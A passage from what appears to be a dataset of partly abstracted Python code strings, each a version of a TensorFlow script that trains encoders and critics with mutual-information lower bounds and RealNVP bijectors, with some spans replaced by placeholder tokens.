By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 
2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n 
bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 
2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n 
bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, 